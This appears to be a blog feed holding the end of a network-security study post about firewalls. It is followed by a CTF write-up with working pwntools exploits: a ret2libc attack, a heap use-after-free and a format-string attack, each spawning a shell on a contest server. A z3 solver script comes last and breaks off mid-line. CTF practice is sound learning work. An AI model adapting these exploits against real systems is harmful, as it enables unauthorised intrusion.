<p>Reject: refuse the packet or information and notify the source that it was blocked</p>
<p>Drop: silently discard the packet or information without notifying the source</p>
<p><strong>3. Basic policies</strong>: Default allow: everything not explicitly prohibited is allowed. Default deny: everything not explicitly allowed is prohibited.</p>
<p><strong>4. Main functions</strong>: a barrier for network security; enforcing the network security policy; monitoring and auditing network access; preventing leakage of internal information.</p>
<h3 id="防火墙的分类"><a href="#防火墙的分类" class="headerlink" title="防火墙的分类"></a>Firewall types</h3>
<p>1. <strong>Packet-filtering firewall</strong></p>
<p>Works at the network and transport layers. An access control list (ACL) is configured and every passing packet is checked.</p>
<p>Evolution: static packet-filtering firewalls, dynamic packet-filtering firewalls (stateful inspection).</p>
<p>Advantages:</p>
<ul>
<li>Simple logic, low cost, small impact on network performance, highly transparent.</li>
<li>Independent of the application layer.</li>
</ul>
<p>Disadvantages:</p>
<ul>
<li>Requires deep knowledge of IP, TCP, UDP and other protocols, otherwise misconfiguration easily causes problems.</li>
<li>Limited filtering; cannot fully satisfy all security requirements.</li>
<li>Cannot completely prevent address spoofing.</li>
</ul>
<p><strong>2. Proxy server</strong></p>
<p>An application-layer proxy / proxy server runs a proxy service program on a host and serves specific application-layer protocols directly, hence it is also called an application firewall.</p>
<p>Advantages:</p>
<ol>
<li>Easy to configure, friendly interface.</li>
<li>No direct connection between internal and external hosts.</li>
<li>Provides detailed logs.</li>
<li>Can hide users' internal IP addresses and authorise individual users.</li>
</ol>
<p>Disadvantages:</p>
<ol>
<li>Relatively slow.</li>
<li>A dedicated proxy service must be built for each network service.</li>
</ol>
<p><strong>3. Circuit-level gateway</strong></p>
<p>Monitors the TCP handshake between trusted clients or servers and untrusted hosts to decide whether a session is legitimate.</p>
<p>Network Address Translation (NAT): a WAN access technology that translates private IP addresses into legitimate WAN IP addresses; widely used.</p>
<p>NAT types: static NAT, dynamic NAT, port translation (NAPT).</p>
<p><strong>4. Hybrid firewall</strong></p>
<h3 id="防火墙的配置方案"><a href="#防火墙的配置方案" class="headerlink" title="防火墙的配置方案"></a>Firewall deployment schemes</h3>
<p><strong>1. Screening router</strong>: the simplest firewall configuration; a packet-filtering router or application gateway is placed directly between the internal and external networks.</p>
<p><strong>2. Dual-homed host</strong>: a host replaces the router to perform the security control function, similar to a packet-filtering firewall, and is the only path for external users into the internal network.</p>
<p>Characteristics: routing on the host is disabled; communication between the two networks goes through the dual-homed host.</p>
<p>Weakness: once the bastion host is compromised, the internal network can be accessed freely.</p>
<p><strong>3. Screened host</strong>: a packet-filtering router connects to the external network and the bastion host sits on the internal network.</p>
<p><strong>4. Screened subnet</strong>: a popular architecture using two packet-filtering routers and a bastion host to create an isolated subnet between the internal and external networks, called the DMZ.</p>
<p>Negotiate protocol parameters<br>Exchange public keys<br>Authenticate both parties<br>Manage the keys after the exchange</p>]]></content>
<summary type="html">
<h1 id="网络安全复习"><a href="#网络安全复习" class="headerlink" title="网络安全复习"></a>Network Security Review</h1>
</summary>
<category term="Study" scheme="https://github.com/gha01un/gha01un.github.io/categories/Study/"/>
<category term="AI" scheme="https://github.com/gha01un/gha01un.github.io/tags/AI/"/>
</entry>
<entry>
<title>Year-End Contest</title>
<link href="https://github.com/gha01un/gha01un.github.io/2020/12/27/%E5%B2%81%E6%9C%AB%E8%B5%9B/"/>
<id>https://github.com/gha01un/gha01un.github.io/2020/12/27/%E5%B2%81%E6%9C%AB%E8%B5%9B/</id>
<published>2020-12-26T16:02:38.471Z</published>
<updated>2021-01-05T11:35:24.840Z</updated>
<content type="html"><![CDATA[<h2 id="岁末赛"><a href="#岁末赛" class="headerlink" title="岁末赛"></a>Year-End Contest</h2><a id="more"></a><h3 id="pwn2"><a href="#pwn2" class="headerlink" title="pwn2"></a>pwn2</h3><div class="highlight-wrap" autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true" data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="comment"># from LibcSearcher import *</span></span><br><span class="line">i=remote(<span class="string">'219.219.61.234'</span>,<span class="number">10001</span>)</span><br><span class="line"><span class="comment">#sh=process('./pwn2')</span></span><br><span class="line">elf=ELF(<span class="string">'./pwn2'</span>)</span><br><span class="line">addr=<span class="number">0x08048753</span></span><br><span class="line">sm=elf.got[<span class="string">'__libc_start_main'</span>]</span><br><span class="line">p_t=elf.plt[<span class="string">'puts'</span>]</span><br><span class="line"></span><br><span class="line">payload1=<span class="string">'\x00'</span>*<span class="number">7</span> +<span class="string">'\xff'</span></span><br><span class="line">i.sendline(payload1)</span><br><span class="line">i.recvuntil(<span class="string">"you_really_know_random_haha\n"</span>)</span><br><span class="line"></span><br><span class="line">payload2=(<span class="number">0x6c</span>+<span class="number">4</span>)*<span class="string">'a'</span>+p32(p_t)+p32(addr)+p32(sm)</span><br><span class="line">i.sendline(payload2)</span><br><span class="line">s_addr=u32(i.recv(<span class="number">4</span>))</span><br><span class="line">info(hex(s_addr))</span><br><span class="line"><span class="comment"># libc=LibcSearcher("__libc_start_main",s_addr)</span></span><br><span class="line">libc = ELF(<span
class="string">'libc6-i386_2.23-0ubuntu11.2_amd64.so'</span>)</span><br><span class="line">A=s_addr-libc.sym[<span class="string">"__libc_start_main"</span>]</span><br><span class="line">info(hex(A))</span><br><span class="line">y_addr=A+libc.sym[<span class="string">'system'</span>]</span><br><span class="line"><span class="comment"># binsh_addr=A+libc.dump('str_bin_sh')</span></span><br><span class="line">binsh_addr = A + <span class="number">0x15910b</span></span><br><span class="line"><span class="comment">#payload1='\x00'*7+'\xff'</span></span><br><span class="line"><span class="comment">#i.sendline(payload1)</span></span><br><span class="line"><span class="comment">#i.recvuntil("you_really_know_random_haha")</span></span><br><span class="line">payload2=(<span class="number">0x6c</span>+<span class="number">4</span>)*<span class="string">'a'</span>+p32(y_addr)+p32(addr)+p32(binsh_addr)</span><br><span class="line">i.sendline(payload2)</span><br><span class="line">i.interactive()</span><br></pre></td></tr></table></figure></div><h3 id="pwn3"><a href="#pwn3" class="headerlink" title="pwn3"></a>pwn3</h3><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="comment">#sh = process("./pwn3")</span></span><br><span class="line">sh = remote(<span class="string">'219.219.61.234'</span>,<span class="string">'10002'</span>)</span><br><span class="line">context.log_level = <span class="string">'info'</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">create</span><span class="params">(size,content)</span>:</span></span><br><span class="line"> sh.recv()</span><br><span class="line"> sh.sendline(<span 
class="string">"1"</span>)</span><br><span class="line"> sh.recv()</span><br><span class="line"> sh.sendline(str(size))</span><br><span class="line"> sh.recv()</span><br><span class="line"> sh.sendline(str(content))</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">delete</span><span class="params">(index)</span>:</span></span><br><span class="line"> sh.recv()</span><br><span class="line"> sh.sendline(<span class="string">"2"</span>)</span><br><span class="line"> sh.recv()</span><br><span class="line"> sh.sendline(str(index))</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">myprint</span><span class="params">(index)</span>:</span></span><br><span class="line"> sh.recv()</span><br><span class="line"> sh.sendline(<span class="string">"3"</span>)</span><br><span class="line"> sh.recv()</span><br><span class="line"> sh.sendline(str(index))</span><br><span class="line"></span><br><span class="line">create(<span class="number">8</span>,<span class="number">12</span> * <span class="string">'a'</span>)</span><br><span class="line">create(<span class="number">16</span>,<span class="string">"bbb"</span>)</span><br><span class="line">delete(<span class="string">"0"</span>)</span><br><span class="line">delete(<span class="string">"1 "</span>)</span><br><span class="line"></span><br><span class="line">sh.recv()</span><br><span class="line">sh.sendline(<span class="string">"1"</span>)</span><br><span class="line">sh.recv()</span><br><span class="line">sh.sendline(<span class="string">"8"</span>)</span><br><span class="line">sh.recv()</span><br><span class="line">sh.sendline(p32(<span class="number">0x08048986</span>))</span><br><span class="line">myprint(<span class="string">"0"</span>)</span><br><span class="line"><span class="comment">#log.success(sh.recv())</span></span><br><span 
class="line">sh.interactive()</span><br></pre></td></tr></table></figure></div><h3 id="pwn4"><a href="#pwn4" class="headerlink" title="pwn4"></a>pwn4</h3><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">sh = process(<span class="string">'./pwn4'</span>)</span><br><span class="line">sh = remote(<span class="string">'219.219.61.234'</span>,<span class="string">'10003'</span>)</span><br><span class="line">context.log_level=<span class="string">'debug'</span></span><br><span class="line">context(arch=<span class="string">'amd64'</span>,os=<span class="string">'linux'</span>)</span><br><span class="line">libc = ELF(<span class="string">'libc-2.23.so'</span>)</span><br><span class="line">elf = ELF(<span class="string">'./pwn4'</span>)</span><br><span class="line">puts_got = elf.got[<span class="string">'printf'</span>]</span><br><span class="line">sh.recv()</span><br><span class="line">sh.sendline(<span class="string">'a'</span>)</span><br><span class="line">sh.recv()</span><br><span class="line">sh.sendline(<span class="string">'3'</span>)</span><br><span class="line">key = <span class="string">'3xpL0r3R'</span></span><br><span class="line">sh.recv()</span><br><span class="line">sh.sendline(str(key))</span><br><span class="line">payload = <span class="string">'aaaa%77$p'</span><span class="comment">#6</span></span><br><span class="line">sh.sendline(payload)</span><br><span class="line">sh.recvuntil(<span class="string">'aaaa0x'</span>)</span><br><span class="line">libc_base = int(int(sh.recv(<span class="number">12</span>),<span class="number">16</span>) - <span class="number">0x20840</span>)</span><br><span class="line">log.success(hex(libc_base))</span><br><span class="line"><span 
class="comment">#gdb.attach(sh)</span></span><br><span class="line">puts_addr = libc_base + libc.sym[<span class="string">'puts'</span>]</span><br><span class="line">log.success(hex(puts_addr))</span><br><span class="line">gad_get = [<span class="number">0x45226</span>,<span class="number">0x4527a</span>,<span class="number">0xf0364</span>,<span class="number">0xf1207</span>]</span><br><span class="line">one_addr = libc_base + gad_get[<span class="number">0</span>]</span><br><span class="line">log.success(hex(one_addr))</span><br><span class="line"><span class="comment">#gdb.attach(sh)</span></span><br><span class="line">payload = fmtstr_payload(<span class="number">6</span>, {puts_got:one_addr})</span><br><span class="line"></span><br><span class="line">sh.sendline(payload)</span><br><span class="line">sh.interactive()</span><br></pre></td></tr></table></figure></div><h3 id="zzzz3333333"><a href="#zzzz3333333" class="headerlink" title="zzzz3333333"></a>zzzz3333333</h3><p>z3</p><p>I don't know why my z3 module had problems; in the end I got the result with sympy.</p><div class="highlight-wrap" autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true" data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">from</span> z3 <span class="keyword">import</span> *</span><br><span class="line">a1=Int(<span class="string">'a1'</span>)</span><br><span class="line">a1[<span class="number">1</span>]=Int(<span class="string">'a1[1]'</span>)</span><br><span class="line">a1[<span class="number">2</span>]=Int(<span class="string">'a1[2]'</span>)</span><br><span class="line">a1[<span class="number">3</span>]=Int(<span class="string">'a1[3]'</span>)</span><br><span class="line">a1[<span class="number">4</span>]=Int(<span class="string">'a1[4]'</span>)</span><br><span class="line">a1[<span class="number">5</span>]=Int(<span class="string">'a1[5]'</span>)</span><br><span class="line">a1[<span
class="number">6</span>]=Int(<span class="string">'a1[6]'</span>)</span><br><span class="line">a1[<span class="number">7</span>]=Int(<span class="string">'a1[7]'</span>)</span><br><span class="line">a1[<span class="number">8</span>]=Int(<span class="string">'a1[8]'</span>)</span><br><span class="line">a1[<span class="number">9</span>]=Int(<span class="string">'a1[9]'</span>)</span><br><span class="line">a1[<span class="number">10</span>]=Int(<span class="string">'a1[10]'</span>)</span><br><span class="line">a1[<span class="number">11</span>]=Int(<span class="string">'a1[11]'</span>)</span><br><span class="line">a1[<span class="number">12</span>]=Int(<span class="string">'a1[12]'</span>)</span><br><span class="line">a1[<span class="number">13</span>]=Int(<span class="string">'a1[13]'</span>)</span><br><span class="line">a1[<span class="number">14</span>]=Int(<span class="string">'a1[14]'</span>)</span><br><span class="line">a1[<span class="number">15</span>]=Int(<span class="string">'a1[15]'</span>)</span><br><span class="line">a1[<span class="number">16</span>]=Int(<span class="string">'a1[16]'</span>)</span><br><span class="line">a1[<span class="number">17</span>]=Int(<span class="string">'a1[17]'</span>)</span><br><span class="line">a1[<span class="number">18</span>]=Int(<span class="string">'a1[18]'</span>)</span><br><span class="line">a1[<span class="number">19</span>]=Int(<span class="string">'a1[19]'</span>)</span><br><span class="line">a1[<span class="number">20</span>]=Int(<span class="string">'a1[20]'</span>)</span><br><span class="line">a1[<span class="number">21</span>]=Int(<span class="string">'a1[21]'</span>)</span><br><span class="line">a1[<span class="number">22</span>]=Int(<span class="string">'a1[22]'</span>)</span><br><span class="line">a1[<span class="number">23</span>]=Int(<span class="string">'a1[23]'</span>)</span><br><span class="line">a1[<span class="number">24</span>]=Int(<span class="string">'a1[24]'</span>)</span><br><span 
class="line">a1[<span class="number">25</span>]=Int(<span class="string">'a1[25]'</span>)</span><br><span class="line">a1[<span class="number">26</span>]=Int(<span class="string">'a1[26]'</span>)</span><br><span class="line">a1[<span class="number">27</span>]=Int(<span class="string">'a1[27]'</span>)</span><br><span class="line">a1[<span class="number">28</span>]=Int(<span class="string">'a1[28]'</span>)</span><br><span class="line">a1[<span class="number">29</span>]=Int(<span class="string">'a1[29]'</span>)</span><br><span class="line">a1[<span class="number">30</span>]=Int(<span class="string">'a1[30]'</span>)</span><br><span class="line">a1[<span class="number">31</span>]=Int(<span class="string">'a1[31]'</span>)</span><br><span class="line">a1[<span class="number">32</span>]=Int(<span class="string">'a1[32]'</span>)</span><br><span class="line">a1[<span class="number">33</span>]=Int(<span class="string">'a1[33]'</span>)</span><br><span class="line">a1[<span class="number">34</span>]=Int(<span class="string">'a1[34]'</span>)</span><br><span class="line">a1[<span class="number">35</span>]=Int(<span class="string">'a1[35]'</span>)</span><br><span class="line">a1[<span class="number">36</span>]=Int(<span class="string">'a1[36]'</span>)</span><br><span class="line">a1[<span class="number">37</span>]=Int(<span class="string">'a1[37]'</span>)</span><br><span class="line">s = Solver()</span><br><span class="line">s.add(<span class="number">48</span> * a1[<span class="number">7</span>] + (a1[<span class="number">5</span>] << <span class="number">6</span>) + <span class="number">4</span> * a1[<span class="number">4</span>] + <span class="number">59</span> * a1[<span class="number">1</span>] + <span class="number">85</span> *a1 + <span class="number">76</span> * a1[<span class="number">2</span>] + <span class="number">65</span> * a1[<span class="number">3</span>] + <span class="number">50</span> * a1[<span class="number">6</span>] + <span class="number">11</span> * 
a1[<span class="number">8</span>] + <span class="number">66</span> * a1[<span class="number">9</span>] == <span class="number">44858</span> ) </span><br><span class="line">s.add( <span class="number">96</span> * a1[<span class="number">7</span>]+ <span class="number">6</span> * a1[<span class="number">6</span>]</span><br><span class="line"> + <span class="number">97</span> * a1[<span class="number">4</span>]</span><br><span class="line"> + <span class="number">71</span> * a1[<span class="number">1</span>]</span><br><span class="line"> + <span class="number">87</span> * a1</span><br><span class="line"> + <span class="number">26</span> * a1[<span class="number">2</span>]</span><br><span class="line"> + <span class="number">80</span> * a1[<span class="number">3</span>]</span><br><span class="line"> + <span class="number">100</span> * a1[<span class="number">5</span>]</span><br><span class="line"> + <span class="number">20</span> * a1[<span class="number">8</span>]</span><br><span class="line"> + <span class="number">46</span> * a1[<span class="number">9</span>] == <span class="number">54177</span> ) </span><br><span class="line">s.add ( <span class="number">82</span> * a1[<span class="number">8</span>]</span><br><span class="line"> + <span class="number">29</span> * a1[<span class="number">7</span>]</span><br><span class="line"> + <span class="number">54</span> * a1[<span class="number">4</span>]</span><br><span class="line"> + <span class="number">22</span> * a1[<span class="number">1</span>]</span><br><span class="line"> + <span class="number">27</span> * a1</span><br><span class="line"> + <span class="number">92</span> * a1[<span class="number">2</span>]</span><br><span class="line"> + <span class="number">9</span> * a1[<span class="number">3</span>]</span><br><span class="line"> + <span class="number">35</span> * a1[<span class="number">5</span>]</span><br><span class="line"> + <span class="number">36</span> * a1[<span class="number">6</span>]</span><br><span 
class="line"> + <span class="number">90</span> * a1[<span class="number">9</span>] == <span class="number">40412</span> ) </span><br><span class="line">s.add ( <span class="number">60</span> * a1[<span class="number">7</span>]</span><br><span class="line"> + <span class="number">31</span> * a1[<span class="number">5</span>]</span><br><span class="line"> + <span class="number">47</span> * a1[<span class="number">0</span>]</span><br><span class="line"> + <span class="number">32</span> * a1[<span class="number">1</span>]</span><br><span class="line"> + <span class="number">55</span> * a1[<span class="number">2</span>]</span><br><span class="line"> + <span class="number">17</span> * a1[<span class="number">3</span>]</span><br><span class="line"> + <span class="number">70</span> * a1[<span class="number">4</span>]</span><br><span class="line"> + <span class="number">10</span> * a1[<span class="number">6</span>]</span><br><span class="line"> + <span class="number">34</span> * a1[<span class="number">8</span>]</span><br><span class="line"> + <span class="number">25</span> * a1[<span class="number">9</span>] == <span class="number">32362</span> ) </span><br><span class="line">s.add( <span class="number">53</span> * a1[<span class="number">7</span>]</span><br><span class="line"> + <span class="number">89</span> * a1[<span class="number">6</span>]</span><br><span class="line"> + <span class="number">13</span> * a1[<span class="number">4</span>]</span><br><span class="line"> + <span class="number">72</span> * a1[<span class="number">3</span>]</span><br><span class="line"> + <span class="number">49</span> * a1[<span class="number">1</span>]</span><br><span class="line"> + <span class="number">18</span> * a1[<span class="number">0</span>]</span><br><span class="line"> + <span class="number">61</span> * a1[<span class="number">2</span>]</span><br><span class="line"> + <span class="number">3</span> * a1[<span class="number">5</span>]</span><br><span class="line"> + <span class="number">67</span> * a1[<span 
class="number">8</span>]</span><br><span class="line"> + <span class="number">15</span> * a1[<span class="number">9</span>] == <span class="number">37176</span> ) </span><br><span class="line">s.add ( <span class="number">78</span> * a1[<span class="number">8</span>]</span><br><span class="line"> + <span class="number">38</span> * a1[<span class="number">5</span>]</span><br><span class="line"> + <span class="number">69</span> * a1[<span class="number">2</span>]</span><br><span class="line"> + <span class="number">77</span> * a1[<span class="number">0</span>]</span><br><span class="line"> + <span class="number">16</span> * a1[<span class="number">1</span>]</span><br><span class="line"> + <span class="number">99</span> * a1[<span class="number">3</span>]</span><br><span class="line"> + <span class="number">33</span> * a1[<span class="number">4</span>]</span><br><span class="line"> + <span class="number">8</span> * a1[<span class="number">6</span>]</span><br><span class="line"> + <span class="number">5</span> * a1[<span class="number">7</span>]</span><br><span class="line"> + <span class="number">91</span> * a1[<span class="number">9</span>] == <span class="number">42742</span> ) </span><br><span class="line">s.add ( <span class="number">62</span> * a1[<span class="number">8</span>]</span><br><span class="line"> + <span class="number">52</span> * a1[<span class="number">7</span>]</span><br><span class="line"> + <span class="number">58</span> * a1[<span class="number">2</span>]</span><br><span class="line"> + <span class="number">45</span> * a1[<span class="number">1</span>]</span><br><span class="line"> + <span class="number">40</span> * a1[<span class="number">0</span>]</span><br><span class="line"> + <span class="number">51</span> * a1[<span class="number">3</span>]</span><br><span class="line"> + <span class="number">24</span> * a1[<span class="number">4</span>]</span><br><span class="line"> + <span class="number">95</span> * a1[<span class="number">5</span>]</span><br><span class="line"> + <span class="number">19</span> * 
a1[<span class="number">6</span>]</span><br><span class="line"> + <span class="number">94</span> * a1[<span class="number">9</span>] == <span class="number">47553</span> ) </span><br><span class="line">s.add ( <span class="number">28</span> * a1[<span class="number">8</span>]</span><br><span class="line"> + <span class="number">63</span> * a1[<span class="number">7</span>]</span><br><span class="line"> + <span class="number">12</span> * a1[<span class="number">6</span>]</span><br><span class="line"> + <span class="number">57</span> * a1[<span class="number">4</span>]</span><br><span class="line"> + <span class="number">30</span> * a1[<span class="number">3</span>]</span><br><span class="line"> + <span class="number">42</span> * a1[<span class="number">2</span>]</span><br><span class="line"> + a1[<span class="number">1</span>]</span><br><span class="line"> + <span class="number">88</span> * a1[<span class="number">0</span>]</span><br><span class="line"> + <span class="number">83</span> * a1[<span class="number">5</span>]</span><br><span class="line"> + <span class="number">73</span> * a1[<span class="number">9</span>] == <span class="number">41059</span> ) </span><br><span class="line">s.add ( <span class="number">41</span> * a1[<span class="number">8</span>]</span><br><span class="line"> + <span class="number">93</span> * a1[<span class="number">6</span>]</span><br><span class="line"> + <span class="number">68</span> * a1[<span class="number">5</span>]</span><br><span class="line"> + <span class="number">98</span> * a1[<span class="number">2</span>]</span><br><span class="line"> + <span class="number">75</span> * a1[<span class="number">1</span>]</span><br><span class="line"> + <span class="number">39</span> * a1[<span class="number">0</span>]</span><br><span class="line"> + <span class="number">86</span> * a1[<span class="number">3</span>]</span><br><span class="line"> + <span class="number">14</span> * a1[<span class="number">4</span>]</span><br><span class="line"> + <span class="number">23</span> * a1[<span 
class="number">7</span>]</span><br><span class="line"> + <span class="number">7</span> * a1[<span class="number">9</span>] == <span class="number">43919</span> ) </span><br><span class="line">s.add( <span class="number">56</span> * a1[<span class="number">8</span>] + <span class="number">74</span> * a1[<span class="number">5</span>] + <span class="number">43</span> * a1[<span class="number">4</span>] + <span class="number">84</span> * a1[<span class="number">3</span>] + <span class="number">44</span> * a1[<span class="number">2</span>] + <span class="number">37</span> * a1[<span class="number">0</span>] + <span class="number">81</span> * a1[<span class="number">1</span>] + <span class="number">2</span> * a1[<span class="number">6</span>] + <span class="number">21</span> * a1[<span class="number">9</span>] == <span class="number">35933</span> ) </span><br><span class="line">s.add( <span class="number">36</span> * a1[<span class="number">16</span>]</span><br><span class="line"> + <span class="number">98</span> * a1[<span class="number">14</span>]</span><br><span class="line"> + <span class="number">79</span> * a1[<span class="number">10</span>]</span><br><span class="line"> + <span class="number">97</span> * a1[<span class="number">11</span>]</span><br><span class="line"> + <span class="number">33</span> * a1[<span class="number">12</span>]</span><br><span class="line"> + <span class="number">60</span> * a1[<span class="number">15</span>]</span><br><span class="line"> + <span class="number">24</span> * a1[<span class="number">17</span>]</span><br><span class="line"> + <span class="number">78</span> * a1[<span class="number">18</span>]</span><br><span class="line"> + <span class="number">72</span> * a1[<span class="number">19</span>] == <span class="number">47783</span> ) </span><br><span class="line">s.add( <span class="number">74</span> * a1[<span class="number">17</span>]</span><br><span class="line"> + <span class="number">39</span> * a1[<span class="number">16</span>]</span><br><span 
class="line"> + <span class="number">51</span> * a1[<span class="number">15</span>]</span><br><span class="line"> + <span class="number">8</span> * a1[<span class="number">14</span>]</span><br><span class="line"> + <span class="number">77</span> * a1[<span class="number">13</span>]</span><br><span class="line"> + <span class="number">69</span> * a1[<span class="number">12</span>]</span><br><span class="line"> + <span class="number">16</span> * a1[<span class="number">11</span>]</span><br><span class="line"> + <span class="number">73</span> * a1[<span class="number">10</span>]</span><br><span class="line"> + (a1[<span class="number">18</span>] << <span class="number">6</span>)</span><br><span class="line"> + <span class="number">28</span> * a1[<span class="number">19</span>] == <span class="number">44266</span> ) </span><br><span class="line">s.add( <span class="number">47</span> * a1[<span class="number">18</span>]</span><br><span class="line"> + <span class="number">52</span> * a1[<span class="number">17</span>]</span><br><span class="line"> + <span class="number">53</span> * a1[<span class="number">16</span>]</span><br><span class="line"> + <span class="number">99</span> * a1[<span class="number">15</span>]</span><br><span class="line"> + a1[<span class="number">14</span>]</span><br><span class="line"> + <span class="number">38</span> * a1[<span class="number">13</span>]</span><br><span class="line"> + <span class="number">67</span> * a1[<span class="number">12</span>]</span><br><span class="line"> + <span class="number">45</span> * a1[<span class="number">11</span>]</span><br><span class="line"> + <span class="number">61</span> * a1[<span class="number">10</span>]</span><br><span class="line"> + <span class="number">66</span> * a1[<span class="number">19</span>] == <span class="number">44988</span> ) </span><br><span class="line">s.add( <span class="number">5</span> * a1[<span class="number">17</span>]</span><br><span class="line"> + <span 
class="number">4</span> * a1[<span class="number">13</span>]</span><br><span class="line"> + <span class="number">89</span> * a1[<span class="number">12</span>]</span><br><span class="line"> + <span class="number">31</span> * a1[<span class="number">10</span>]</span><br><span class="line"> + <span class="number">11</span> * a1[<span class="number">11</span>]</span><br><span class="line"> + <span class="number">93</span> * a1[<span class="number">14</span>]</span><br><span class="line"> + <span class="number">3</span> * a1[<span class="number">15</span>]</span><br><span class="line"> + <span class="number">84</span> * a1[<span class="number">16</span>]</span><br><span class="line"> + <span class="number">65</span> * a1[<span class="number">18</span>]</span><br><span class="line"> + <span class="number">100</span> * a1[<span class="number">19</span>] == <span class="number">46698</span> ) </span><br><span class="line">s.add( <span class="number">82</span> * a1[<span class="number">16</span>]</span><br><span class="line"> + <span class="number">62</span> * a1[<span class="number">13</span>]</span><br><span class="line"> + <span class="number">58</span> * a1[<span class="number">12</span>]</span><br><span class="line"> + <span class="number">42</span> * a1[<span class="number">11</span>]</span><br><span class="line"> + <span class="number">86</span> * a1[<span class="number">10</span>]</span><br><span class="line"> + <span class="number">85</span> * a1[<span class="number">14</span>]</span><br><span class="line"> + <span class="number">27</span> * a1[<span class="number">15</span>]</span><br><span class="line"> + <span class="number">43</span> * a1[<span class="number">17</span>]</span><br><span class="line"> + <span class="number">15</span> * a1[<span class="number">18</span>]</span><br><span class="line"> + <span class="number">26</span> * a1[<span class="number">19</span>] == <span class="number">45689</span> ) </span><br><span class="line">s.add( <span 
class="number">22</span> * a1[<span class="number">16</span>]</span><br><span class="line"> + <span class="number">34</span> * a1[<span class="number">13</span>]</span><br><span class="line"> + <span class="number">2</span> * a1[<span class="number">12</span>]</span><br><span class="line"> + <span class="number">23</span> * a1[<span class="number">11</span>]</span><br><span class="line"> + <span class="number">46</span> * a1[<span class="number">10</span>]</span><br><span class="line"> + <span class="number">29</span> * a1[<span class="number">14</span>]</span><br><span class="line"> + <span class="number">48</span> * a1[<span class="number">15</span>]</span><br><span class="line"> + <span class="number">35</span> * a1[<span class="number">17</span>]</span><br><span class="line"> + <span class="number">19</span> * a1[<span class="number">18</span>]</span><br><span class="line"> + <span class="number">70</span> * a1[<span class="number">19</span>] == <span class="number">27224</span> ) </span><br><span class="line">s.add( <span class="number">96</span> * a1[<span class="number">18</span>]</span><br><span class="line"> + <span class="number">81</span> * a1[<span class="number">17</span>]</span><br><span class="line"> + <span class="number">92</span> * a1[<span class="number">15</span>]</span><br><span class="line"> + <span class="number">54</span> * a1[<span class="number">14</span>]</span><br><span class="line"> + <span class="number">94</span> * a1[<span class="number">11</span>]</span><br><span class="line"> + <span class="number">57</span> * a1[<span class="number">10</span>]</span><br><span class="line"> + <span class="number">55</span> * a1[<span class="number">12</span>]</span><br><span class="line"> + <span class="number">80</span> * a1[<span class="number">13</span>]</span><br><span class="line"> + <span class="number">71</span> * a1[<span class="number">16</span>]</span><br><span class="line"> + <span class="number">25</span> * a1[<span 
class="number">19</span>] == <span class="number">58395</span> ) </span><br><span class="line">s.add( <span class="number">13</span> * a1[<span class="number">17</span>]</span><br><span class="line"> + <span class="number">75</span> * a1[<span class="number">13</span>]</span><br><span class="line"> + <span class="number">21</span> * a1[<span class="number">11</span>]</span><br><span class="line"> + <span class="number">59</span> * a1[<span class="number">10</span>]</span><br><span class="line"> + <span class="number">56</span> * a1[<span class="number">12</span>]</span><br><span class="line"> + <span class="number">50</span> * a1[<span class="number">14</span>]</span><br><span class="line"> + <span class="number">41</span> * a1[<span class="number">15</span>]</span><br><span class="line"> + <span class="number">44</span> * a1[<span class="number">16</span>]</span><br><span class="line"> + <span class="number">40</span> * a1[<span class="number">18</span>]</span><br><span class="line"> + <span class="number">49</span> * a1[<span class="number">19</span>] == <span class="number">40625</span> ) </span><br><span class="line">s.add( <span class="number">12</span> * a1[<span class="number">16</span>]</span><br><span class="line"> + <span class="number">91</span> * a1[<span class="number">14</span>]</span><br><span class="line"> + <span class="number">88</span> * a1[<span class="number">13</span>]</span><br><span class="line"> + <span class="number">87</span> * a1[<span class="number">12</span>]</span><br><span class="line"> + <span class="number">68</span> * a1[<span class="number">10</span>]</span><br><span class="line"> + <span class="number">7</span> * a1[<span class="number">11</span>]</span><br><span class="line"> + <span class="number">83</span> * a1[<span class="number">15</span>]</span><br><span class="line"> + <span class="number">20</span> * a1[<span class="number">17</span>]</span><br><span class="line"> + <span class="number">32</span> * a1[<span 
class="number">18</span>]</span><br><span class="line"> + <span class="number">37</span> * a1[<span class="number">19</span>] == <span class="number">45008</span> ) </span><br><span class="line">s.add( <span class="number">10</span> * a1[<span class="number">17</span>]</span><br><span class="line"> + <span class="number">18</span> * a1[<span class="number">16</span>]</span><br><span class="line"> + <span class="number">9</span> * a1[<span class="number">15</span>]</span><br><span class="line"> + <span class="number">6</span> * a1[<span class="number">14</span>]</span><br><span class="line"> + <span class="number">76</span> * a1[<span class="number">10</span>]</span><br><span class="line"> + <span class="number">14</span> * a1[<span class="number">11</span>]</span><br><span class="line"> + <span class="number">17</span> * a1[<span class="number">12</span>]</span><br><span class="line"> + <span class="number">90</span> * a1[<span class="number">13</span>]</span><br><span class="line"> + <span class="number">63</span> * a1[<span class="number">18</span>]</span><br><span class="line"> + <span class="number">30</span> * a1[<span class="number">19</span>] == <span class="number">32400</span> ) </span><br><span class="line">s.add( <span class="number">83</span> * a1[<span class="number">26</span>]</span><br><span class="line"> + <span class="number">45</span> * a1[<span class="number">25</span>]</span><br><span class="line"> + <span class="number">4</span> * a1[<span class="number">24</span>]</span><br><span class="line"> + <span class="number">48</span> * a1[<span class="number">22</span>]</span><br><span class="line"> + <span class="number">38</span> * a1[<span class="number">20</span>]</span><br><span class="line"> + <span class="number">22</span> * a1[<span class="number">21</span>]</span><br><span class="line"> + <span class="number">7</span> * a1[<span class="number">23</span>]</span><br><span class="line"> + <span class="number">62</span> * a1[<span 
